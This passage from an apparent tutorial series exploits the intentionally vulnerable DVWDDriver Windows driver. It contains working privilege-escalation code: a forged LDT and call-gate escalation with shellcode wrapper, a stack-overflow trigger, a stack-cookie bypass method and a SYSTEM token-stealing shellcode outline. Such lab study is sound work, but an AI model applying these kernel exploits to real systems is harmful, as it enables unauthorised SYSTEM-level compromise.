  • Bits 0-1: we call the call-gate from user mode, so we put the value 11 (binary) here (ring 3, decimal value 3).
  • Bit 2: set to 1, because we place the call-gate descriptor in the LDT.
  • Bits 3-15: the index into the GDT/LDT. Our call-gate is the first entry of the LDT, so we set the index to 0.
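The selector layout can be checked with a small encoder and decoder in portable C. The function names are hypothetical; the bit positions are the ones given in the text (RPL in bits 0-1, table indicator in bit 2, index in bits 3-15).

```c
#include <assert.h>
#include <stdint.h>

/* Build a 16-bit segment selector from its three fields. */
uint16_t make_selector(uint16_t index, unsigned table_is_ldt, unsigned rpl)
{
    assert(index < 8192u && table_is_ldt <= 1u && rpl <= 3u);
    return (uint16_t)((index << 3) | (table_is_ldt << 2) | rpl);
}

/* Decode the fields of an existing selector. */
unsigned selector_index(uint16_t sel)  { return sel >> 3; }
unsigned selector_is_ldt(uint16_t sel) { return (sel >> 2) & 1u; }
unsigned selector_rpl(uint16_t sel)    { return sel & 3u; }
```

Index 0 in the LDT with RPL 3 gives 0x0007, the selector used for the far call, while index 1 in the GDT with RPL 0 gives 0x0008, the kernel code segment selector mentioned earlier.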

3. Exploitation methodology


Now that the GDT and the LDT have been introduced, we can start talking about exploitation.

Basically, the exploit creates a new LDT. We then add a single entry to that LDT: a call-gate descriptor, filled with the right values as explained above.

Then we use the write-what-where weakness to overwrite the LDT descriptor with a forged LDT descriptor:

  • What = LDT descriptor of the forged LDT,
  • Where = location of the LDT descriptor. The LDT is described by a KGDTENTRY structure called LdtDescriptor which, as we saw before, is a field of _KPROCESS.

So we retrieve the address of the _KPROCESS structure of our process (which is also the address of its _EPROCESS) and add the appropriate offset (0x20 on Windows Server 2003 SP2) to get the location we want to write to.

Finally, we invoke our call-gate with a FAR CALL on the first (and only) entry of the LDT of the current process. This jumps to our shellcode.

4. Shellcoding


Ok, so we have seen how the exploitation works. We will reuse the shellcode from the previous article (about exploiting the write-what-where weakness through HalDispatchTable). But there's a problem… After our payload has executed, we need to return from the call-gate. A FAR CALL through the call-gate changes the code segment as well as EIP, so we need a FAR RET (0xCB) after execution. That way we resume at the next instruction of our exploit. It is also important to remember that the FS segment register, which in user mode points to the TEB (Thread Environment Block), must point to the KPCR (Kernel Processor Control Region) in kernel mode. In fact:

  • In kernel mode, FS=0x30
  • In user mode, FS=0x3B

Therefore FS must be set to 0x30 before executing our shellcode in kernel mode, and restored to 0x3B before returning. For these two reasons, the author of DVWDExploit wrote an assembly wrapper (ReturnFromGate) that performs those operations. It is the address of this wrapper that must be placed in the Offset field of the call-gate descriptor.
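The wrapper carries a 4-byte placeholder (0x41414141) where the payload address has to be written before use. The sketch below, in portable C with hypothetical helper names, shows one way to locate such a placeholder in a byte array and replace it with a 32-bit value in little-endian order. It is generic byte patching and not the code used by DVWDExploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Write a 32-bit value in little-endian order at a given offset. */
void patch_u32_le(uint8_t *code, size_t code_len, size_t offset, uint32_t value)
{
    assert(code != NULL && offset <= code_len && code_len - offset >= 4);
    code[offset + 0] = (uint8_t)(value & 0xFFu);
    code[offset + 1] = (uint8_t)((value >> 8) & 0xFFu);
    code[offset + 2] = (uint8_t)((value >> 16) & 0xFFu);
    code[offset + 3] = (uint8_t)(value >> 24);
}

/* Find the first occurrence of the 0x41414141 placeholder; -1 if absent. */
long find_placeholder(const uint8_t *code, size_t code_len)
{
    for (size_t i = 0; i + 4 <= code_len; i++) {
        if (code[i] == 0x41 && code[i + 1] == 0x41 &&
            code[i + 2] == 0x41 && code[i + 3] == 0x41)
            return (long)i;
    }
    return -1;
}
```

Applied to the ReturnFromGate bytes from the exploit listing, the placeholder is found at offset 18, which matches the OFFSET_SHELLCODE constant defined there.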

5. Exploitation details


Ok, so we now understand the details of this exploitation. Here's how it works:

  1. Retrieve the address of the payload to execute in kernel mode (named KernelPayload), that is, the code that patches the access token of the current process.
  2. Retrieve the address of the _KPROCESS structure.
  3. Retrieve the address of the LDT descriptor that is loaded into the GDT (stored at _KPROCESS + offset 0x20).
  4. Create a new LDT with the ZwSetInformationProcess() system call exported by ntdll.dll. This is done by a function called SetLDTEnv().
  5. Put the address of KernelPayload into the ReturnFromGate wrapper, which will call the shellcode, and place the wrapper in executable memory.
  6. Create the call-gate descriptor with a function called PrepareCallGate32(). We already know how to fill in the call-gate fields so that code can be executed in ring 0 from ring 3.
  7. Create the LDT descriptor (corresponding to the LDT created earlier) with the PrepareLDTDescriptor32() function.
  8. Use the vulnerability to overwrite the existing LDT descriptor with the descriptor of the forged LDT: store the new LDT descriptor in GlobalOverwriteStruct with the DEVICEIO_DVWD_STORE IOCTL of DVWDDriver, then copy the content of GlobalOverwriteStruct over the existing LDT descriptor with the DEVICEIO_DVWD_OVERWRITE IOCTL.
  9. Force a process context switch. In fact, the LDT segment descriptor in the GDT is only updated after a context switch. All we need to do is sleep for a while.
  10. Finally, make our FAR CALL to the call-gate. That triggers the execution of the wrapper, which executes our shellcode in kernel mode.
  11. When our shellcode returns, the running process has the SID of NT AUTHORITY\SYSTEM, and we can do whatever we want!

A picture may shed some light on this… =)

6. Exploit code


Here is a code snippet from DVWDExploit with many comments I've added.

#!c++
// ----------------------------------------------------------------------------
// Arbitrary Memory Overwrite exploitation ------------------------------------
// ---- Method using LDT  -----------------------------------------------------
// ----------------------------------------------------------------------------


typedef NTSTATUS (WINAPI *_ZwSetInformationProcess)(HANDLE ProcessHandle, 
                       PROCESS_INFORMATION_CLASS ProcessInformationClass,  
                       PPROCESS_LDT_INFORMATION ProcessInformation,
                       ULONG ProcessInformationLength);    

// Fill the Call-Gate Descriptor -------------------------------------------------
VOID PrepareCallGate32(PCALL_GATE32 pGate, PVOID Payload) {

 ULONG_PTR IPayload = (ULONG_PTR)Payload;

 RtlZeroMemory(pGate, sizeof(CALL_GATE32));

 pGate->Fields.OffsetHigh   = (IPayload & 0xFFFF0000) >> 16;
 pGate->Fields.OffsetLow    = (IPayload & 0x0000FFFF);
 pGate->Fields.Type     = 12;   // Gate Descriptor
 pGate->Fields.Param    = 0;
 pGate->Fields.Present    = 1;
 pGate->Fields.SegmentSelector  = 1 << 3;  // Kernel Code Segment Selector
 pGate->Fields.Dpl     = 3;
}

// Setup the LDT descriptor ------------------------------------------------------
VOID PrepareLDTDescriptor32(PLDT_ENTRY pLDTDesc, PVOID LDTBasePtr) {

 ULONG_PTR LDTBase = (ULONG_PTR)LDTBasePtr;

 RtlZeroMemory(pLDTDesc, sizeof(LDT_ENTRY));

 pLDTDesc->BaseLow     = LDTBase & 0x0000FFFF;
 pLDTDesc->LimitLow     = 0xFFFF;
 pLDTDesc->HighWord.Bits.BaseHi  = (LDTBase & 0xFF000000) >> 24;
 pLDTDesc->HighWord.Bits.BaseMid = (LDTBase & 0x00FF0000) >> 16;
 pLDTDesc->HighWord.Bits.Type = 2;
 pLDTDesc->HighWord.Bits.Pres  = 1;
}


// Assembly wrapper to the payload to be able to return from the Call-Gate ------
// (using a FAR RET)
#define OFFSET_SHELLCODE 18
CHAR ReturnFromGate[]="\x90\x90\x90\x90\x90\x90\x90\x90"
       "\x60"                  // pushad       save general purpose registers
       "\x0F\xA0"              // push  fs     save FS segment register
       "\x66\xB8\x30\x00"      // mov  ax, 30h   
       // FS value is different between userland (0x3B) and kernelland (0x30)
       "\x8E\xE0"              // mov  fs, ax     
       "\xB8\x41\x41\x41\x41"  // mov  eax, @Shellcode  invoke the payload
       "\xFF\xD0"              // call  eax  
       "\x0F\xA1"              // pop   fs     restore FS segment register
       "\x61"                  // popad        restore general purpose registers
       "\xcb";                 // retf       far ret


// Assembly code that executes a CALL to 0007:00000000 ----------------------------
// (Segment selector: 0x0007, offset address: 0x00000000)
// 16-bit segment selector:
// [ 13-bit index into GDT/LDT ][0=descriptor in GDT/1=descriptor in LDT]
// [Requested Privilege Level: 00=ring0/11=ring3]
// => 0007 means: index 0 (first entry), descriptor in LDT, ring3
VOID FarCall() {
 __asm { 
   _emit 0x9A
   _emit 0x00
   _emit 0x00
   _emit 0x00
   _emit 0x00
   _emit 0x07
   _emit 0x00
 }
}

// Use the vulnerability to overwrite the LDT Descriptor into GDT ------------------
BOOL OverwriteGDTEntry(ULONG64 LDTDesc, PVOID *KGDTEntry) {

 HANDLE hFile;
 ARBITRARY_OVERWRITE_STRUCT overwrite;
 ULONG64 storage = LDTDesc;
 BOOL ret;
 DWORD dwReturn;

 hFile = CreateFile(L"\\\\.\\DVWD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);

 if(hFile != INVALID_HANDLE_VALUE) {
  overwrite.Size = 8;
  overwrite.StorePtr = (PVOID)&storage;
  ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);

  overwrite.Size = 8;
  overwrite.StorePtr = (PVOID)KGDTEntry;
  ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);

  CloseHandle(hFile);

  return TRUE;
 }

 return FALSE;
}


// Create a new LDT using ZwSetInformationProcess ----------------------------------
BOOL SetLDTEnv(VOID) {

 NTSTATUS retStatus;
 LDT_ENTRY eLdt;
 PROCESS_LDT_INFORMATION infoLdt; 
 _ZwSetInformationProcess ZwSetInformationProcess;

 // Retrieve the address of the undocumented syscall ZwSetInformationProcess()
 ZwSetInformationProcess = (_ZwSetInformationProcess)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwSetInformationProcess");

 if(!ZwSetInformationProcess)
  return FALSE;

 // Create and initialize a new LDT
 RtlZeroMemory(&eLdt, sizeof(LDT_ENTRY));

 RtlCopyMemory(&(infoLdt.LdtEntries[0]), &eLdt, sizeof(LDT_ENTRY));
 infoLdt.Start = 0;
 infoLdt.Length = sizeof(LDT_ENTRY);

 retStatus = ZwSetInformationProcess(GetCurrentProcess(), 
             ProcessLdtInformation, 
             &infoLdt, 
             sizeof(PROCESS_LDT_INFORMATION));

 if(retStatus != STATUS_SUCCESS)
  return FALSE;

 return TRUE;
}


#define LDT_DESC_FROM_KPROCESS 0x20
ULONG64 LDTDescStorage32=0;

// Main function -------------------------------------------------------------------
BOOL LDTDescOverwrite32(VOID) {

 PVOID kprocess,kprocessLDTDesc;
 PLDT_ENTRY pLDTDesc = (PLDT_ENTRY)&LDTDescStorage32;
 PVOID ReturnFromGateArea = NULL;
 PCALL_GATE32 pGate = NULL;

 // User standard SIDList Patch
 FARPROC KernelPayload = (FARPROC)UserShellcodeSIDListPatchCallGate;

 // Retrieve the KPROCESS Address == EPROCESS Address
 kprocess = FindCurrentEPROCESS();
 if(!kprocess)
  return FALSE;

 // Address of LDT Descriptor
 // kd> dt nt!_kprocess
 kprocessLDTDesc = (PBYTE)kprocess + LDT_DESC_FROM_KPROCESS;
 printf("[--] kprocessLDTDesc found at: %p\n", kprocessLDTDesc);

 // Create a new LDT entry
 if(!SetLDTEnv())
  return FALSE;

 // Fixup the Gate Payload (replace 0x41414141 by the address of the kernel payload)
 // and put it into executable memory
 RtlCopyMemory(ReturnFromGate + OFFSET_SHELLCODE, &KernelPayload, sizeof(FARPROC));
 ReturnFromGateArea = CreateUspaceExecMapping(1);
 RtlCopyMemory(ReturnFromGateArea, ReturnFromGate, sizeof(ReturnFromGate));

 // Build the Call-Gate(system descriptor), we pass the address of the shellcode
 pGate = CreateUspaceMapping(1);
 PrepareCallGate32(pGate, (PVOID)ReturnFromGateArea);

 // Build the fake LDT Descriptor with a Call-Gate (the one previously created) 
 PrepareLDTDescriptor32(pLDTDesc, (PVOID)pGate);

 printf("[--] LDT Descriptor fake: 0x%llx\n", LDTDescStorage32);

 // Trigger the vulnerability: overwrite the LdtDescriptor field in KPROCESS
 OverwriteGDTEntry(LDTDescStorage32, kprocessLDTDesc);

 // We force a process context switch
 // Indeed, the LDT segment descriptor into the GDT is updated only after a context 
 // switch. So, it's needed before being able to use the Call-Gate
 Sleep(1000);

 // Trigger the call gate via a FAR CALL (see assembly code)
 FarCall();

 return TRUE;
}


// This is where we begin ... ------------------------------------------------
BOOL TriggerOverwrite32_LDTRemappingWay() {

 // Load the Kernel Executive ntoskrnl.exe in userland and get some symbol's kernel address
 if(LoadAndGetKernelBase() == FALSE)
  return FALSE;

 // We exploit the vulnerability with a payload that patches the SID list to get 
 // SYSTEM privilege and then we spawn a shell if it succeeds
 if(LDTDescOverwrite32() == TRUE) {
  if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
   wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
   return FALSE;
  }
 }

 return TRUE;
}
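
The comment above FarCall() splits the selector 0x0007 into its three fields. As a minimal sketch of that decoding (the type and function names here are hypothetical and not part of DVWDExploit), the following C helper extracts the index, the table indicator and the requested privilege level from any 16-bit selector:

```c
#include <stdint.h>

/* Fields of a 16-bit x86 segment selector (hypothetical helper type). */
typedef struct {
    unsigned index; /* bits 15..3: entry index in the descriptor table */
    unsigned ti;    /* bit 2: table indicator, 0 = GDT, 1 = LDT        */
    unsigned rpl;   /* bits 1..0: requested privilege level            */
} selector_fields;

/* Split a selector into its three fields. */
selector_fields decode_selector(uint16_t sel)
{
    selector_fields f;
    f.index = (unsigned)sel >> 3;
    f.ti    = ((unsigned)sel >> 2) & 1u;
    f.rpl   = (unsigned)sel & 3u;
    return f;
}
```

For 0x0007 this gives index 0, table indicator 1 (LDT) and RPL 3, which is why the far call lands on the first entry of the forged LDT. The kernel code selector 0x0008 used in PrepareCallGate32() decodes to index 1 in the GDT with RPL 0.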

7. w00t ?


The results are as follows:

Again w00t!!!!!

References


[1] GDT and LDT in Windows kernel vulnerability exploitation, by Matthew “j00ru” Jurczyk & Gynvael Coldwind, Hispasec (16 January 2010)

[2] Intel Manual Vol. 3A & 3B http://www.intel.com/products/processor/manuals/

[3] Task State Segment (TSS) http://en.wikipedia.org/wiki/Task_State_Segment

[4] Call-Gate, by Ivanlef0u http://www.ivanlef0u.tuxfamily.org/?p=86

0x04 Exploiting the stack-based buffer overflow vulnerability (bypassing the cookie)


In this article, we exploit the stack-based buffer overflow in the driver, which is triggered when we pass it a large buffer (with the DEVICEIO_DVWD_STACKOVERFLOW IOCTL). The key point is that the overflowed buffer lives in kernel mode, and we can overflow it just as we would in user mode (the concept is the same). As we saw in the first article in this series, the culprit is the driver's use of the RtlCopyMemory() function.

First we will see how to detect the vulnerability in the driver, and then how to exploit it successfully.

1. Triggering the vulnerability


To trigger the vulnerability, I wrote a small piece of code:

#! c++
#include <windows.h>
#include <winioctl.h>
#include <stdio.h>
#include <string.h>
#include <conio.h>

/* IOCTL */
#define DEVICEIO_DVWD_STACKOVERFLOW CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

int main(int argc, char *argv[]) {
    char junk[512];
    HANDLE hDevice;
    DWORD dwReturn = 0;  /* required by DeviceIoControl when lpOverlapped is NULL */

    printf("--[ Fuzz IOCTL DEVICEIO_DVWD_STACKOVERFLOW ---------------------------\n");

    printf("[~] Building junk data to send to the driver...\n");
    memset(junk, 'A', 511);
    junk[511] = '\0';

    printf("[~] Open an handle to the driver DVWD...\n");
    hDevice = CreateFile("\\\\.\\DVWD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
    printf("\tHandle: %p\n", hDevice);
    getch();

    printf("[~] Send IOCTL DEVICEIO_DVWD_STACKOVERFLOW with junk data...\n");
    DeviceIoControl(hDevice, DEVICEIO_DVWD_STACKOVERFLOW, &junk, strlen(junk), NULL, 0, &dwReturn, NULL);

    CloseHandle(hDevice);
    return 0;
}

The code is straightforward: it builds 512 bytes of junk data (511 ‘A’ characters plus a terminating ‘\0’) and sends the 511 ‘A’ bytes to the driver, since the length passed is strlen(junk). This is more than enough to overflow the buffer used by the driver, which is only 64 bytes long. Let’s compile and run the code above; this is what we get:

BOUM! A great BSOD happened!

Now we attach the Windows test VM to a remote kernel debugger, which runs in another Windows VM. All the details about setting up this remote debugging environment with VMware are given in [3].

When we run the code again and send the buffer to the driver, the Windows VM freezes.

At the same time, the remote kernel debugger reports a “Fatal System Error”:

#! bash
*** Fatal System Error: 0x000000f7
                       (0xB497BD51,0xF786C6EA,0x08793915,0x00000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

To get more information, we type !analyze -v and get the following result:

#! bash
kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer.  This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned.  This is the classic "buffer overrun"
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments:
Arg1: b497bd51, Actual security check cookie from the stack
Arg2: f786c6ea, Expected security check cookie
Arg3: 08793915, Complement of the expected security check cookie
Arg4: 00000000, zero

Debugging Details:
------------------

DEFAULT_BUCKET_ID:  GS_FALSE_POSITIVE_MISSING_GSFRAME
SECURITY_COOKIE:  Expected f786c6ea found b497bd51
BUGCHECK_STR:  0xF7
PROCESS_NAME:  fuzzIOCTL.EXE
CURRENT_IRQL:  0
LAST_CONTROL_TRANSFER:  from 80825b5b to 8086cf70

STACK_TEXT:
f5d6f770 80825b5b 00000003 b497bd51 00000000 nt!RtlpBreakWithStatusInstruction
f5d6f7bc 80826a4f 00000003 000001ff 0012fcdc nt!KiBugCheckDebugBreak+0x19
f5d6fb54 80826de7 000000f7 b497bd51 f786c6ea nt!KeBugCheck2+0x5d1
f5d6fb74 f7858662 000000f7 b497bd51 f786c6ea nt!KeBugCheckEx+0x1b
WARNING: Stack unwind information not available. Following frames may be wrong.
f5d6fb94 f7858316 f785808c 02503afa 82499078 DVWDDriver!DvwdHandleIoctlStackOverflow+0x5ce
f5d6fc10 41414141 41414141 41414141 41414141 DVWDDriver!DvwdHandleIoctlStackOverflow+0x282
f5d6fc14 41414141 41414141 41414141 41414141 0x41414141
f5d6fc18 41414141 41414141 41414141 41414141 0x41414141
[...]
f5d6fd20 41414141 41414141 41414141 41414141 0x41414141
f5d6fd24 41414141 41414141 41414141 41414141 0x41414141

STACK_COMMAND:  kb
FOLLOWUP_IP:
DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
f7858662 cc              int     3
SYMBOL_STACK_INDEX:  4
SYMBOL_NAME:  DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: DVWDDriver
IMAGE_NAME:  DVWDDriver.sys
DEBUG_FLR_IMAGE_TIMESTAMP:  4e08f4d5
FAILURE_BUCKET_ID:  0xF7_MISSING_GSFRAME_DVWDDriver!DvwdHandleIoctlStackOverflow+5ce
BUCKET_ID:  0xF7_MISSING_GSFRAME_DVWDDriver!DvwdHandleIoctlStackOverflow+5ce

This proves that the kernel stack has been overrun: all of our ‘A’ bytes (0x41) show up in the stack dump at the time of the crash. The important part, however, is the bugcheck code DRIVER_OVERRAN_STACK_BUFFER (f7), which means that the kernel itself detected the overflow. This is the stack-cookie mechanism (also known as a stack canary) at work, and the principle is the same as in user mode (the /GS compiler option in MS Visual Studio). A security cookie (a pseudo-random 4-byte value) is placed on the stack between the local variables and the saved EBP, so an overflow that aims to overwrite the saved return address (the value later loaded into EIP) has to overwrite the cookie first. At the end of the function, the cookie on the stack is compared with the original (expected) value. If they do not match, a fatal error is raised before the function returns, that is, before the overwritten return address can be used.
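
To make the cookie check concrete, here is a deliberately simplified user-mode model in C. It is only a sketch under stated assumptions: the frame layout, the names and the fixed cookie value (borrowed from the bugcheck output above) are hypothetical, and the real /GS implementation differs in its details. It only shows why a linear overflow of the 64-byte buffer necessarily corrupts the cookie before it reaches the return address.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define LOCAL_BUF_SIZE  64u          /* size of the driver's local buffer, per the text */
#define EXPECTED_COOKIE 0xF786C6EAu  /* illustrative value taken from the bugcheck      */

/* Simplified model of a protected stack frame, lowest address first. */
typedef struct {
    uint8_t  buffer[LOCAL_BUF_SIZE];
    uint32_t cookie;
    uint32_t saved_ebp;
    uint32_t return_address;
} mock_frame;

/* Copies len bytes into the frame the way an unchecked copy would, then
 * performs the epilogue check. Returns 1 if the cookie is still intact. */
int copy_then_check_cookie(const uint8_t *src, size_t len)
{
    mock_frame frame;

    memset(&frame, 0, sizeof frame);
    frame.cookie = EXPECTED_COOKIE;

    if (len > sizeof frame)   /* keep the simulation inside the mock frame */
        len = sizeof frame;
    memcpy(&frame, src, len); /* writes past buffer[] when len > 64 */

    return frame.cookie == EXPECTED_COOKIE;
}
```

With 64 bytes of input the check passes; with 68 bytes or more the cookie has been overwritten and the check fails, which is the situation the kernel reports as bugcheck 0xF7.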

2. Stack-Canary ?


If we disassemble the vulnerable function, we see the following:

At the beginning of the function there is a call to __SEH_prolog4_GS. This function is used to:

  • Create the exception handler block (EXCEPTION_REGISTRATION_RECORD) corresponding to the __try{} __except{} block written in the function

  • Create the stack canary

At the end of the function, we see a call to __SEH_epilog4_GS. This function retrieves the current value of the stack canary and calls the __security_check_cookie() function, which compares the current value with the expected one. The expected value (symbol: __security_cookie) is stored in the .data section. If the values do not match, the system crashes (BSOD), as it did in the previous test.

3. Bypass stack-canary in kernel mode


To bypass the stack canary, the goal is to raise an exception before the cookie is checked (before the __security_check_cookie() function is called). The idea is to cause a memory fault by making the driver access an unmapped area in user space (not in kernel space). To do so, we use the CreateFileMapping() and MapViewOfFileEx() API calls to create an anonymous memory mapping (see [1] and [2]) and fill it with the address of our shellcode (written later).

When sending the DEVICEIO_DVWD_STACKOVERFLOW IOCTL, what matters is how we pass the user-mode buffer pointer and its size to the driver. The trick is to position the buffer pointer so that the end of the buffer falls on the next, unmapped page: it is enough for only the last four bytes of the buffer to lie outside the anonymous mapping. The book by the author of DVWDDriver illustrates this quite well with this picture:

This way, when the driver reads the buffer (to copy it), it ends up trying to read a memory area that is not mapped in user space. An exception is raised before the cookie check is reached, and in kernel mode this makes it possible to bypass the stack canary through SEH.
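
The pointer adjustment is plain arithmetic, sketched below in C. The function names are hypothetical, and the sizes used in the note that follows (a 64 KiB mapping and a 128-byte buffer) are assumptions chosen for illustration, since the text does not give the actual buffer size.

```c
#include <stddef.h>

/* Offset, from the start of the mapping, at which the buffer must begin so
 * that exactly `overhang` of its bytes lie past the end of the mapping.
 * Assumes overhang <= buf_size and buf_size - overhang <= map_size. */
size_t buffer_start_offset(size_t map_size, size_t buf_size, size_t overhang)
{
    return map_size - (buf_size - overhang);
}

/* Number of bytes of [start, start + buf_size) that lie beyond the mapping. */
size_t bytes_past_mapping(size_t map_size, size_t start, size_t buf_size)
{
    size_t end = start + buf_size;
    return end > map_size ? end - map_size : 0;
}
```

With a 0x10000-byte mapping, a 128-byte buffer and an overhang of 4, the buffer starts at offset 0x10000 - 124, so its first 124 bytes are readable and its last 4 bytes fall into the unmapped area that follows the mapping.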

4. Shellcoding


For my tests, I decided not to use the shellcode given in DVWDExploit. Instead of patching the SID list in the access token of the exploiting process, I wanted to use another method: steal the access token of a process running as NT AUTHORITY\SYSTEM and overwrite the access token of the exploiting process with it. I did not reinvent the wheel for the shellcode; I simply based it on the two nice shellcodes described in papers [4] and [5]. The algorithm is as follows:

  1. Find the _KTHREAD structure of the current thread in _KPRCB.
  2. From _KTHREAD, find the _EPROCESS structure of the current process.
  3. Walk the _EPROCESS list to find the process with PID 4 (UniqueProcessId = 4); this is the “System” process, which runs as NT AUTHORITY\SYSTEM.
  4. Retrieve the address of that process's token.
  5. Find the _EPROCESS of the process whose privileges we want to escalate.
  6. Replace that process's token with the token of the “System” process.
  7. Use the SYSEXIT instruction to return to user mode. Before calling SYSEXIT, the registers are adjusted as explained in [4], in order to jump directly to a user-mode payload that then runs with full privileges.
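
Steps 3 to 6 boil down to walking a circular doubly linked list whose links are embedded inside each process structure, and converting a link pointer back into a pointer to its enclosing structure. The following C sketch models this on mock user-mode data only. Every type and function name here is hypothetical, the field layout does not match the real _EPROCESS, and the separate list head that exists in the real kernel is ignored for simplicity.

```c
#include <stddef.h>
#include <stdint.h>

/* Mock of a doubly linked list entry (same idea as _LIST_ENTRY). */
typedef struct mock_list_entry {
    struct mock_list_entry *flink;
    struct mock_list_entry *blink;
} mock_list_entry;

/* Mock process record with its list links embedded in the middle. */
typedef struct {
    uint32_t        pid;
    mock_list_entry links;
    uintptr_t       token;
} mock_process;

/* Recover the enclosing record from a pointer to its links field; this is
 * what "sub eax, FLINK_OFFSET" does in the assembly version. */
#define PROCESS_FROM_LINKS(p) \
    ((mock_process *)((char *)(p) - offsetof(mock_process, links)))

/* Walk the circular list from `start` until a record with `pid` is found. */
mock_process *find_by_pid(mock_process *start, uint32_t pid)
{
    mock_process *cur = start;
    do {
        if (cur->pid == pid)
            return cur;
        cur = PROCESS_FROM_LINKS(cur->links.flink);
    } while (cur != start);
    return NULL;
}

/* Give the record `to_pid` the token of the record `from_pid`. */
int copy_token(mock_process *any, uint32_t from_pid, uint32_t to_pid)
{
    mock_process *src = find_by_pid(any, from_pid);
    mock_process *dst = find_by_pid(any, to_pid);
    if (src == NULL || dst == NULL)
        return 0;
    dst->token = src->token;
    return 1;
}
```

Unlike this model, the assembly version later in the article has no termination condition for a PID that is not present, so it relies on both PIDs existing in the list.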

First, we need the kernel structure offsets for Windows Server 2003 SP2. To find them, we use kd to drill down into these structures:

#! c++
kd> r
eax=00000001 ebx=000063a3 ecx=80896d4c edx=000002f8 esi=00000000 edi=ed8fcfa8
eip=8086cf70 esp=80894560 ebp=80894570 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202

kd> dg @fs
                                  P Si Gr Pr Lo
Sel    Base     Limit     Type    l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
0030 ffdff000 00001fff Data RW    0 Bg Pg P  Nl 00000c92

kd> dt nt!_kpcr ffdff000
   [...]
   +0x120 PrcbData         : _KPRCB

kd> dt nt!_kprcb ffdff000+0x120
   +0x000 MinorVersion     : 1
   +0x002 MajorVersion     : 1
   +0x004 CurrentThread    : 0x80896e40 _KTHREAD
   +0x008 NextThread       : (null)
   +0x00c IdleThread       : 0x80896e40 _KTHREAD
   [...]

kd> dt nt!_kthread 0x80896e40
   +0x000 Header           : _DISPATCHER_HEADER
   +0x010 MutantListHead   : _LIST_ENTRY [ 0x80896e50 - 0x80896e50 ]
   +0x018 InitialStack     : 0x808948b0 Void
   +0x01c StackLimit       : 0x808918b0 Void
   +0x020 KernelStack      : 0x808945fc Void
   +0x024 ThreadLock       : 0
   +0x028 ApcState         : _KAPC_STATE
   +0x028 ApcStateFill     : [23]  "hn???"
   +0x03f ApcQueueable     : 0x1 ''
   [...]

kd> dt nt!_kapc_state 0x80896e40+0x28
   +0x000 ApcListHead      : [2] _LIST_ENTRY [ 0x80896e68 - 0x80896e68 ]
   +0x010 Process          : 0x808970c0 _KPROCESS
   +0x014 KernelApcInProgress : 0 ''
   +0x015 KernelApcPending : 0 ''
   +0x016 UserApcPending   : 0 ''

kd> dt nt!_eprocess 0x808970c0
   +0x000 Pcb              : _KPROCESS
   +0x078 ProcessLock      : _EX_PUSH_LOCK
   +0x080 CreateTime       : _LARGE_INTEGER 0x0
   +0x088 ExitTime         : _LARGE_INTEGER 0x0
   +0x090 RundownProtect   : _EX_RUNDOWN_REF
   +0x094 UniqueProcessId  : (null)
   +0x098 ActiveProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x0a0 QuotaUsage       : [3] 0
   +0x0ac QuotaPeak        : [3] 0
   +0x0b8 CommitCharge     : 0
   +0x0bc PeakVirtualSize  : 0
   +0x0c0 VirtualSize      : 0
   +0x0c4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x0cc DebugPort        : (null)
   +0x0d0 ExceptionPort    : (null)
   +0x0d4 ObjectTable      : 0xe1000c60 _HANDLE_TABLE
   +0x0d8 Token            : _EX_FAST_REF
   +0x0dc WorkingSetPage   : 0x17f40
   [...]

kd> dt nt!_list_entry
   +0x000 Flink            : Ptr32 _LIST_ENTRY
   +0x004 Blink            : Ptr32 _LIST_ENTRY

kd> dt nt!_token -r1 @@(0xe1001727 & ~7)
   +0x000 TokenSource      : _TOKEN_SOURCE
      +0x000 SourceName       : [8]  "*SYSTEM*"
      +0x008 SourceIdentifier : _LUID
   +0x010 TokenId          : _LUID
      +0x000 LowPart          : 0x3ea
      +0x004 HighPart         : 0n0
   +0x018 AuthenticationId : _LUID
      +0x000 LowPart          : 0x3e7
      +0x004 HighPart         : 0n0
   +0x020 ParentTokenId    : _LUID
      +0x000 LowPart          : 0
      +0x004 HighPart         : 0n0
   +0x028 ExpirationTime   : _LARGE_INTEGER 0x6207526`b64ceb90
      +0x000 LowPart          : 0xb64ceb90
      +0x004 HighPart         : 0n102790438
      +0x000 u                : __unnamed
      +0x000 QuadPart         : 0n441481572610010000
   [...]

From this, we can deduce the following offsets (useful for writing the shellcode on Windows Server 2003 SP2):

  • _KTHREAD: the pointer to the current _KTHREAD is located at fs:[0x124] (in kernel mode, the FS segment points to _KPCR).

